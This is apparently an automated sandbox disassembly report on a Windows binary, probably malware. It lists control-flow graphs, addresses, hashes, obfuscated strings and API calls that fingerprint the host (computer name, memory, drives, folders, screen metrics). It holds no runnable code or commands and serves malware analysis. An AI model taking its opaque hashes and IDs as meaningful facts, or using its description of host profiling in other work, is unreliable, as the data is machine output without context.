                                                        • Instruction ID: 8656d014051cfeae6f38fc6e5bc27d53fcdcc23dc9b32e8d9396b3c6709607b7
                                                        • Opcode Fuzzy Hash: 68ded5a1127ff787cf997603004e9156167bbfc9199ee1ec6ad3b0f1b8bf95cb
                                                        • Instruction Fuzzy Hash: 0122DD7170C790CFD3248B28D58036BBBE1BB95324F558A2EE5E9873D1D7B988418B4B

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 267 408a60-408a71 call 4416b0 270 408d05-408d07 ExitProcess 267->270 271 408a77-408a7e call 43a2c0 267->271 274 408d00 call 442000 271->274 275 408a84-408abb GetCurrentProcessId GetCurrentThreadId 271->275 274->270 276 408ac3-408b93 SHGetSpecialFolderPathW GetForegroundWindow 275->276 277 408abd-408ac1 275->277 279 408b95-408bb7 276->279 280 408bdc-408bef 276->280 277->276 281 408bb9-408bbb 279->281 282 408bbd-408bda 279->282 283 408bf0-408c1c 280->283 281->282 282->280 283->283 284 408c1e-408c4a call 4404b0 283->284 287 408c50-408c8b 284->287 288 408cc4-408ce2 call 40a170 287->288 289 408c8d-408cc2 287->289 292 408ce4 call 40d400 288->292 293 408cee-408cf5 288->293 289->287 296 408ce9 call 40c050 292->296 293->274 295 408cf7-408cfd call 408280 293->295 295->274 296->293
                                                        APIs
                                                        • GetCurrentProcessId.KERNEL32 ref: 00408A84
                                                        • GetCurrentThreadId.KERNEL32 ref: 00408A8E
                                                        • SHGetSpecialFolderPathW.SHELL32(00000000,?,00000010,00000000), ref: 00408B76
                                                        • GetForegroundWindow.USER32 ref: 00408B8B
                                                        • ExitProcess.KERNEL32 ref: 00408D07
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.1878306484.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_400000_file.jbxd
                                                        Similarity
                                                        • API ID: CurrentProcess$ExitFolderForegroundPathSpecialThreadWindow
                                                        • String ID:
                                                        • API String ID: 4063528623-0
                                                        • Opcode ID: ba99a32a84df6074fc1a326d170a01607909a1aa19cc5cd935f515b9d2d4cca7
                                                        • Instruction ID: 695b1043c619777a8863990e744e8888075fa37916c6100b3e536846f602c71f
                                                        • Opcode Fuzzy Hash: ba99a32a84df6074fc1a326d170a01607909a1aa19cc5cd935f515b9d2d4cca7
                                                        • Instruction Fuzzy Hash: E3616873B143140BD318AE799C1635AB6D39BC5314F0F863EA995EB7D1ED7888068389

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 300 42f716-42f73a 301 42f740-42f754 300->301 301->301 302 42f756-42f75d 301->302 303 42f77b-42fbcb 302->303 304 42f75f-42f763 302->304 307 42fbd0-42fbe4 303->307 305 42f770-42f779 304->305 305->303 305->305 307->307 308 42fbe6-42fbed 307->308 309 42fc0b-42fc17 308->309 310 42fbef-42fbf3 308->310 312 42fc31-42fc55 call 443b60 309->312 313 42fc19-42fc1b 309->313 311 42fc00-42fc09 310->311 311->309 311->311 316 42fc5a-42fcae GetPhysicallyInstalledSystemMemory 312->316 315 42fc20-42fc2d 313->315 315->315 317 42fc2f 315->317 318 42fcb0-42fcea 316->318 317->312 318->318 319 42fcec-42fd2f call 41dce0 318->319 322 42fd30-42fd75 319->322 322->322 323 42fd77-42fd7e 322->323 324 42fd80-42fd88 323->324 325 42fd9d 323->325 326 42fd90-42fd99 324->326 327 42fda1-42fda9 325->327 326->326 328 42fd9b 326->328 329 42fdbb-42fdc8 327->329 330 42fdab-42fdaf 327->330 328->327 332 42fdca-42fdd1 329->332 333 42fdeb-42fe57 329->333 331 42fdb0-42fdb9 330->331 331->329 331->331 334 42fde0-42fde9 332->334 335 42fe60-42fe85 333->335 334->333 334->334 335->335 336 42fe87-42fe8e 335->336 337 42fe90-42fe94 336->337 338 42feab-42feb8 336->338 339 42fea0-42fea9 337->339 340 42feba-42fec1 338->340 341 42fedb-42ff7a 338->341 339->338 339->339 342 42fed0-42fed9 340->342 342->341 342->342
                                                        APIs
                                                        • GetPhysicallyInstalledSystemMemory.KERNELBASE(?), ref: 0042FC65
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.1878306484.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_400000_file.jbxd
                                                        Similarity
                                                        • API ID: InstalledMemoryPhysicallySystem
                                                        • String ID: 5$Tx+$bC
                                                        • API String ID: 3960555810-2958649183
                                                        • Opcode ID: bd69bc838739ae90d4b0a58172e55ce76a86b20f4efd0bead3c1e9785a5287de
                                                        • Instruction ID: 57781aab13a08c1a066b8e14d20b5adcd793598ba32206fb76d556f76c65c1e4
                                                        • Opcode Fuzzy Hash: bd69bc838739ae90d4b0a58172e55ce76a86b20f4efd0bead3c1e9785a5287de
                                                        • Instruction Fuzzy Hash: 66B1C17050C3918AE7358F2990643ABFFE0AF93304F98496ED5C987392D7794409CB56

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 343 42fb7d-42fbcb call 437610 call 408280 349 42fbd0-42fbe4 343->349 349->349 350 42fbe6-42fbed 349->350 351 42fc0b-42fc17 350->351 352 42fbef-42fbf3 350->352 354 42fc31-42fcae call 443b60 GetPhysicallyInstalledSystemMemory 351->354 355 42fc19-42fc1b 351->355 353 42fc00-42fc09 352->353 353->351 353->353 360 42fcb0-42fcea 354->360 357 42fc20-42fc2d 355->357 357->357 359 42fc2f 357->359 359->354 360->360 361 42fcec-42fd2f call 41dce0 360->361 364 42fd30-42fd75 361->364 364->364 365 42fd77-42fd7e 364->365 366 42fd80-42fd88 365->366 367 42fd9d 365->367 368 42fd90-42fd99 366->368 369 42fda1-42fda9 367->369 368->368 370 42fd9b 368->370 371 42fdbb-42fdc8 369->371 372 42fdab-42fdaf 369->372 370->369 374 42fdca-42fdd1 371->374 375 42fdeb-42fe57 371->375 373 42fdb0-42fdb9 372->373 373->371 373->373 376 42fde0-42fde9 374->376 377 42fe60-42fe85 375->377 376->375 376->376 377->377 378 42fe87-42fe8e 377->378 379 42fe90-42fe94 378->379 380 42feab-42feb8 378->380 381 42fea0-42fea9 379->381 382 42feba-42fec1 380->382 383 42fedb-42ff7a 380->383 381->380 381->381 384 42fed0-42fed9 382->384 384->383 384->384
                                                        APIs
                                                        • GetPhysicallyInstalledSystemMemory.KERNELBASE(?), ref: 0042FC65
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.1878306484.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_400000_file.jbxd
                                                        Similarity
                                                        • API ID: InstalledMemoryPhysicallySystem
                                                        • String ID: 5$Tx+$bC
                                                        • API String ID: 3960555810-2958649183
                                                        • Opcode ID: b019f8faa7078be6aa673cad719c14887d56416cdb44293ea95d0146935d494c
                                                        • Instruction ID: c6dbd191573f8eaa778921652fb4887c0da57f4868ba9d7cab245032b22be67a
                                                        • Opcode Fuzzy Hash: b019f8faa7078be6aa673cad719c14887d56416cdb44293ea95d0146935d494c
                                                        • Instruction Fuzzy Hash: D0A1C17050C3918AE739CF2994603EBBFE0AF96304F58897ED5C987392D7794409CB56

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 385 40c080-40c2df 386 40c2e0-40c315 385->386 386->386 387 40c317-40c323 386->387 388 40c326-40c343 387->388
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.1878306484.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_400000_file.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: 50$DM_e$FwPq$Js$'!
                                                        • API String ID: 0-1711485358
                                                        • Opcode ID: c4c1f8e28e835abe653d42ead9130a3bdb40cd1f355abcf11e9a7fb6b3c4c5b3
                                                        • Instruction ID: a29f9b67a002a0f45ebf0d2c5d73cf8b9506a9b5be0e3ba76b97c1ae1caaee17
                                                        • Opcode Fuzzy Hash: c4c1f8e28e835abe653d42ead9130a3bdb40cd1f355abcf11e9a7fb6b3c4c5b3
                                                        • Instruction Fuzzy Hash: C751DAB45493808FE334CF21C991B8BBBB1BBA1304F609A0CE6D95B654CB759446CF97

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 389 425713-425719 390 425722 389->390 391 42571b-425720 389->391 392 425725-425755 call 408270 RtlExpandEnvironmentStrings 390->392 391->392 395 425764-42576d 392->395 396 42575c 392->396 397 425776 395->397 398 42576f-425774 395->398 396->395 399 42577d-4257d2 call 408270 397->399 398->399 402 4257e0-425802 399->402 402->402 403 425804-42580c 402->403 404 425831-425845 403->404 405 42580e-425813 403->405 407 425861-42586f call 445260 404->407 408 425847-42584b 404->408 406 425820-42582f 405->406 406->404 406->406 411 425874-42587c 407->411 409 425850-42585f 408->409 409->407 409->409 412 425883-42588d 411->412 413 425a50 411->413 414 425896-42589f 411->414 412->414 418 425a56-425a7f 413->418 415 4258a1-4258a6 414->415 416 4258a8 414->416 417 4258af-425979 call 408270 415->417 416->417 424 425980-4259b6 417->424 419 425a80-425a92 418->419 419->419 421 425a94-425b2a 419->421 423 425b30-425b5f 421->423 423->423 426 425b61-425b84 call 4219a0 423->426 424->424 425 4259b8-4259c3 424->425 427 4259e1-4259ee 425->427 428 4259c5-4259ca 425->428 436 425b8c-425b92 call 408280 426->436 431 4259f0-4259f4 427->431 432 425a11-425a31 GetLogicalDrives call 445260 427->432 430 4259d0-4259df 428->430 430->427 430->430 434 425a00-425a0f 431->434 432->418 432->436 439 425bc2-425bc8 call 408280 432->439 440 425ba1-425ba9 call 408280 432->440 441 425d95 432->441 442 425a4a 432->442 443 425b9b 432->443 444 425a38-425a42 432->444 445 425bb9-425bbf call 408280 432->445 446 425d8f 432->446 447 425bac-425bb8 432->447 434->432 434->434 436->443 439->446 440->447 441->441 442->413 443->440 444->442 445->439 446->441
                                                        APIs
                                                        • RtlExpandEnvironmentStrings.NTDLL(00000000,?,0000000E,00000000,?,?), ref: 00425743
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.1878306484.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_400000_file.jbxd
                                                        Similarity
                                                        • API ID: EnvironmentExpandStrings
                                                        • String ID: 67
                                                        • API String ID: 237503144-1886922373
                                                        • Opcode ID: e3d5ee6a10ef3cb590ca084e24df21bec85322a84b333c3760c72d733834ca72
                                                        • Instruction ID: 69054aec17b57e4c885244c43c85c7a2a523591f4f2f134b8c84ae4bc1ca1ac0
                                                        • Opcode Fuzzy Hash: e3d5ee6a10ef3cb590ca084e24df21bec85322a84b333c3760c72d733834ca72
                                                        • Instruction Fuzzy Hash: 6EB1A9B4508710CBD7109F54E88176BBBE0FF86708F44496EE9849B391E7B9C949CB8B

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 455 437c10-437cf5 GetSystemMetrics * 2 461 437cfc-43812e 455->461
                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.1878306484.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_400000_file.jbxd
                                                        Similarity
                                                        • API ID: MetricsSystem
                                                        • String ID:
                                                        • API String ID: 4116985748-3916222277
                                                        • Opcode ID: 12748a352a6113057c12441240e5b0ee108c97012b660969c1fdd4a02f1b159c
                                                        • Instruction ID: 45907af0f9aaa3a0b9b12b1f6695193350465b50a920b4478e3ecda7c38bd9fb
                                                        • Opcode Fuzzy Hash: 12748a352a6113057c12441240e5b0ee108c97012b660969c1fdd4a02f1b159c
                                                        • Instruction Fuzzy Hash: 23C15BB05093808BE7B0DF64D99979BFBF1BB85308F10992EE5984B354C7B89449CF4A

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 464 418ba2-418c02 465 418c10-418c4c 464->465 465->465 466 418c4e-418c6e call 401dd0 465->466 469 418da0-418da6 call 408280 466->469 470 419040-419049 call 401f60 466->470 471 418d83-418d9c 466->471 472 418fa3-418fb0 466->472 473 418fe6-419010 call 41bdd0 466->473 474 418da9-418dba 466->474 475 419030 466->475 476 419050-419056 call 401f60 466->476 477 418c75-418ccb 466->477 478 418dd4-418de9 call 401e00 466->478 479 418fb7-418fc5 466->479 480 419018-419021 call 408280 466->480 481 41903a 466->481 469->474 470->476 483 418dbd-418dcd call 401df0 471->483 472->469 472->470 472->473 472->474 472->475 472->476 472->479 472->480 486 41905f-4195af 472->486 473->480 474->483 475->481 476->486 491 418cd0-418cf4 477->491 504 418e50 478->504 505 418deb-418df0 478->505 487 418fe1 479->487 488 418fc7-418fcf 479->488 480->475 481->470 483->469 483->470 483->472 483->473 483->474 483->475 483->476 483->478 483->479 483->480 483->481 483->486 487->473 498 418fd0-418fdf 488->498 491->491 501 418cf6-418d79 call 41bdd0 491->501 498->487 498->498 501->471 508 418e52-418e55 504->508 507 418e09-418e0b 505->507 510 418e00 507->510 511 418e0d-418e1e 507->511 512 418e60 508->512 513 418e57-418e5c 508->513 514 418e01-418e07 510->514 511->510 515 418e20-418e38 511->515 516 418e67-418eb2 call 408270 call 40aff0 512->516 513->516 514->507 514->508 515->510 517 418e3a-418e46 515->517 523 418ec0-418ec2 516->523 524 418eb4-418eb9 516->524 517->514 519 418e48-418e4b 517->519 519->514 525 418ec9-418ee4 call 408270 523->525 524->525 528 418f01-418f2f 525->528 529 418ee6-418eeb 525->529 531 418f30-418f4a 528->531 530 418ef0-418eff 529->530 530->528 530->530 531->531 532 418f4c-418f60 531->532 533 418f81-418f8f call 445260 532->533 534 418f62-418f67 532->534 537 418f94-418f9c 533->537 535 418f70-418f7f 534->535 535->533 535->535 537->469 537->470 537->472 537->473 537->474 537->475 537->476 537->479 537->480 537->486
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.1878306484.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_400000_file.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: PWPQ$bd\,$fnga$oQ
                                                        • API String ID: 0-3706350231
                                                        • Opcode ID: fe0c42c07420c9bbc5d61f49a80fd29d9882301a9105f023342265155b572c4c
                                                        • Instruction ID: e34152e6636813154928bb160b9fd2834c9c91dba41fdab838839377217cf8bd
                                                        • Opcode Fuzzy Hash: fe0c42c07420c9bbc5d61f49a80fd29d9882301a9105f023342265155b572c4c
                                                        • Instruction Fuzzy Hash: 1CC126766083408FD7258F24C8557AB77E6EFC6314F08892EE8998B391EF388841C787

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 538 428750-428771 539 428780-4287b1 538->539 539->539 540 4287b3-4287c0 539->540 541 4287c2-4287cf 540->541 542 428804-42882b 540->542 544 4287d0-4287d7 541->544 543 428830-428859 542->543 543->543 545 42885b-428861 543->545 546 4287e0-4287e7 544->546 547 4287d9-4287dc 544->547 548 428867-428894 call 4404b0 545->548 549 428998-4289a1 545->549 546->542 551 4287e9-4287fc call 442080 546->551 547->544 550 4287de 547->550 556 4288a0-4288e5 548->556 550->542 554 428801 551->554 554->542 556->556 557 4288e7-4288ee 556->557 558 4288f4-4288fa 557->558 559 428989-42898b 557->559 561 428900-428907 558->561 560 42898f-428995 call 4404d0 559->560 560->549 563 428910-428917 561->563 564 428909-42890c 561->564 563->559 567 428919-42892e call 442080 563->567 564->561 566 42890e 564->566 566->559 569 428933-42893a 567->569 569->560 570 42893c-428942 569->570 571 428950-42895b 570->571 571->571 572 42895d-428980 571->572 573 4289a2 572->573 574 428982-428987 572->574 575 4289a4-4289b1 call 408270 573->575 574->575 578 4289d0-4289da 575->578 579 4289c0-4289ce 578->579 580 4289dc-4289df 578->580 579->578 582 4289f3-4289f7 579->582 581 4289e0-4289ef 580->581 581->581 583 4289f1 581->583 584 428b02-428b0b call 408280 582->584 585 4289fd-428a09 582->585 583->579 584->560 586 428a0b-428a12 585->586 587 428a4d-428aa8 call 408270 call 409180 585->587 589 428a2c-428a30 586->589 601 428ab0-428add 587->601 592 428a32-428a3b 589->592 593 428a20 589->593 597 428a42-428a46 592->597 598 428a3d-428a40 592->598 596 428a21-428a2a 593->596 596->587 596->589 597->596 600 428a48-428a4b 597->600 598->596 600->596 601->601 602 428adf-428afe call 4092e0 call 408280 601->602 602->584
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.1878306484.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_400000_file.jbxd
                                                        Similarity
                                                        • API ID: InitializeThunk
                                                        • String ID: &76#$/X$BDE:
                                                        • API String ID: 2994545307-3468712750
                                                        • Opcode ID: bda00dd6b24e91b95935bd233f1bfdad870dd724f28d61ad92188f97a0c207be
                                                        • Instruction ID: de511f14106650819994a34559177bbffe3ae858db635c904efe7b47fdd347f8
                                                        • Opcode Fuzzy Hash: bda00dd6b24e91b95935bd233f1bfdad870dd724f28d61ad92188f97a0c207be
                                                        • Instruction Fuzzy Hash: 4C9146B27093119BD3109F25EC8176FB6D2EBC5318F58813EE4858B381EA3C9846878B

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 607 430f54-430f62 608 430f64-430f6b 607->608 609 430f7b-430fef FreeLibrary call 443b60 607->609 610 430f70-430f79 608->610 615 430ff0-43100a 609->615 610->609 610->610 615->615 616 43100c-431016 615->616 617 43102b-4310a8 GetComputerNameExA 616->617 618 431018-43101f 616->618 620 4310af 617->620 619 431020-431029 618->619 619->617 619->619 620->620
                                                        APIs
                                                        • FreeLibrary.KERNEL32(?), ref: 00430F85
                                                        • GetComputerNameExA.KERNELBASE(00000006,?,00000100), ref: 0043104A
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.1878306484.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_400000_file.jbxd
                                                        Similarity
                                                        • API ID: ComputerFreeLibraryName
                                                        • String ID:
                                                        • API String ID: 2904949787-0
                                                        • Opcode ID: d64d061adfdbf120dee82a0fc1018915ebc31be6462cf1f122b0efd75b845ce0
                                                        • Instruction ID: 7b7113e42e32beabe8c4c016577568230ad12c23f9774a4b5fe118adb1295c8a
                                                        • Opcode Fuzzy Hash: d64d061adfdbf120dee82a0fc1018915ebc31be6462cf1f122b0efd75b845ce0
                                                        • Instruction Fuzzy Hash: 9531F33691C3D08BE3348F359C553EBBBE2ABC6314F19866DC8D857285DB7A1805CB86

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 621 430f4e-430fef FreeLibrary call 443b60 626 430ff0-43100a 621->626 626->626 627 43100c-431016 626->627 628 43102b-4310a8 GetComputerNameExA 627->628 629 431018-43101f 627->629 631 4310af 628->631 630 431020-431029 629->630 630->628 630->630 631->631
                                                        APIs
                                                        • FreeLibrary.KERNEL32(?), ref: 00430F85
                                                        • GetComputerNameExA.KERNELBASE(00000006,?,00000100), ref: 0043104A
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.1878306484.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_400000_file.jbxd
                                                        Similarity
                                                        • API ID: ComputerFreeLibraryName
                                                        • String ID:
                                                        • API String ID: 2904949787-0
                                                        • Opcode ID: d43ff3280345835f4c21c516bd395dd340a58cd7044fd3e67ca854e034ba4060
                                                        • Instruction ID: fb4d1f38de1a85f36896b77157d4be4448694684cc70b9096da98958b1763f09
                                                        • Opcode Fuzzy Hash: d43ff3280345835f4c21c516bd395dd340a58cd7044fd3e67ca854e034ba4060
                                                        • Instruction Fuzzy Hash: D931F23695C3908BE3348F359C953DBBBE2ABC6314F19862DC8D817284DB7A1805CB86
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.1878306484.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_400000_file.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: dbee84ecd3790633f2c83826065bd30b531f242f0a5518141b0bd449406d4866
                                                        • Instruction ID: fe71d1bcebcc68b075db47888e1e2cba677fa4d5c187ad294acff22be9a80e62
                                                        • Opcode Fuzzy Hash: dbee84ecd3790633f2c83826065bd30b531f242f0a5518141b0bd449406d4866
                                                        • Instruction Fuzzy Hash: 1B51B9B16086428FC714CF58C4917ABF7E2ABD5304F18892EE4EA87342E739DD45CB86
                                                        APIs
                                                        • GetComputerNameExA.KERNELBASE(00000006,?,00000100), ref: 0043104A
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.1878306484.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_400000_file.jbxd
                                                        Similarity
                                                        • API ID: ComputerName
                                                        • String ID:
                                                        • API String ID: 3545744682-0
                                                        • Opcode ID: b124762bb82201bc91150ff6a1fbec5ae2415c41406e4d3524ac183859c93793
                                                        • Instruction ID: 4d6f8d4a3a0c9291bd82fbf102df9c74bb0e146b1c020dae9dd1e6f681f2a276
                                                        • Opcode Fuzzy Hash: b124762bb82201bc91150ff6a1fbec5ae2415c41406e4d3524ac183859c93793
                                                        • Instruction Fuzzy Hash: D921E1369583A04BE3348F359C913DBBBE2ABC6314F09872DC8D817285DB7A1805CBC6
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.1878306484.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_400000_file.jbxd
                                                        Similarity
                                                        • API ID: InitializeThunk
                                                        • String ID: Y\]R
                                                        • API String ID: 2994545307-2023185185
                                                        • Opcode ID: e368f69b4051d92f4704c4a144e7348ede97506515b2c153191350598cb49a47
                                                        • Instruction ID: 32cb53c941d059e59dbce30d87d00b37379897002de2ab33e1c58f8979392959
                                                        • Opcode Fuzzy Hash: e368f69b4051d92f4704c4a144e7348ede97506515b2c153191350598cb49a47
                                                        • Instruction Fuzzy Hash: 6E910371A087118BE314CF29D89076BF7E2FBC5314F18862DE89597391DB79DC0A8786
                                                        APIs
                                                        • LdrInitializeThunk.NTDLL(0044523A,?,00000018,?,?,00000018,?,?,?), ref: 004420AE
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.1878306484.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_400000_file.jbxd
                                                        Similarity
                                                        • API ID: InitializeThunk
                                                        • String ID:
                                                        • API String ID: 2994545307-0
                                                        • Opcode ID: 428b37146f2ab8bbef251fdb989594d24ae2c5b49c4db8728953df82dacde34d
                                                        • Instruction ID: 0c3231226d6b2b3a527619dcc08e6164a4fafcc19f94aab6dc14dc2c5ea58878
                                                        • Opcode Fuzzy Hash: 428b37146f2ab8bbef251fdb989594d24ae2c5b49c4db8728953df82dacde34d
                                                        • Instruction Fuzzy Hash: A2E0FE75908316AF9A08CF45C14444EFBE5BFC4714F11CC8DA4D863210D3B0AD46DF82
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.1878306484.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_400000_file.jbxd
                                                        Similarity
                                                        • API ID: InitializeThunk
                                                        • String ID:
                                                        • API String ID: 2994545307-0
                                                        • Opcode ID: dacedb78e00f7b3ea06162b8a930dfcecaa1b39c86591f60bbd6e03e633e71ac
                                                        • Instruction ID: 5aabee4b8b26e2ec9a193049fa608abe716db33e51fa934c25155f6b19f8c581
                                                        • Opcode Fuzzy Hash: dacedb78e00f7b3ea06162b8a930dfcecaa1b39c86591f60bbd6e03e633e71ac
                                                        • Instruction Fuzzy Hash: AC9115316083018BEB14DF29D86072FB7E2FFC9724F15892DE9C597390D73898158B8A
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.1878306484.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_400000_file.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: e23383d503dd4dbdf91b2871d6f5546dc280df0b90b4798c3f127ca15e464351
                                                        • Instruction ID: 9ecb6df6af24b1f74966394131ffdcc5ba7ea28be31435c304ffc82d0aba2bdf
                                                        • Opcode Fuzzy Hash: e23383d503dd4dbdf91b2871d6f5546dc280df0b90b4798c3f127ca15e464351
                                                        • Instruction Fuzzy Hash: 43519D22B457624BD7048A3898802A6BBA3DFD6361F9CC73FC491873D6DB7C980AC345
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.1878306484.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_400000_file.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 43fca39a7f72a1f4448c48acaadee8de276498a9144bd6424f4a2099b91a712c
                                                        • Instruction ID: e35f2f60d65f04bb18af1f8d7cf5bd4ec7f66c51464b3c3842bee00e328901c8
                                                        • Opcode Fuzzy Hash: 43fca39a7f72a1f4448c48acaadee8de276498a9144bd6424f4a2099b91a712c
                                                        • Instruction Fuzzy Hash: 3B51F671A0C6018FD3188B28D59032BB7E2BBC9328F159B2FE4A5573D1D279C946CB4B
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.1878306484.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_400000_file.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 4c5a90b9fb371d52f131ad3a9995dc80354c686060061162c2bdec51d185e8da
                                                        • Instruction ID: 01036c0abe53894f00a23a0b33865d1644de07ddd8768e0b6d49d0c725de61cd
                                                        • Opcode Fuzzy Hash: 4c5a90b9fb371d52f131ad3a9995dc80354c686060061162c2bdec51d185e8da
                                                        • Instruction Fuzzy Hash: 0F4100BA4583028BD314CF51D89035BFAE3ABC5308F19CA2DE4C95B344DAB9C5098B96
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.1878306484.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_400000_file.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 136ff0709e28839b269720e4fb839b7b46befae130c92130e2f97ddf8959a9d5
                                                        • Instruction ID: d294dc39abdefed7299eeb113bd94dd65164e84cb7974bfe8d228d73c8c27ee3
                                                        • Opcode Fuzzy Hash: 136ff0709e28839b269720e4fb839b7b46befae130c92130e2f97ddf8959a9d5
                                                        • Instruction Fuzzy Hash: 1911D0792593018BD308CF55DC9136BFBE3ABC6348F19C92DE18557355CAB8C106CB5A

                                                        Control-flow Graph

                                                        APIs
                                                        • GetForegroundWindow.USER32 ref: 004423C5
                                                        • GetForegroundWindow.USER32 ref: 004423E0
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.1878306484.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_400000_file.jbxd
                                                        Similarity
                                                        • API ID: ForegroundWindow
                                                        • String ID:
                                                        • API String ID: 2020703349-0
                                                        • Opcode ID: ea1af17a4c87661e7e22aa3b412247517447923eaeb0832990aa116f906f78b1
                                                        • Instruction ID: 3f5cde6939bccaa2b971e6e0c262a6c41a2af89a1d69f81b939c4d59ebd80ce7
                                                        • Opcode Fuzzy Hash: ea1af17a4c87661e7e22aa3b412247517447923eaeb0832990aa116f906f78b1
                                                        • Instruction Fuzzy Hash: D3D0A7BDD114104BB2559720BC0E45F36119B9B20A304443CE4070121BEA35118E868E
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.1878306484.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_400000_file.jbxd
                                                        Similarity
                                                        • API ID: AllocString
                                                        • String ID:
                                                        • API String ID: 2525500382-0
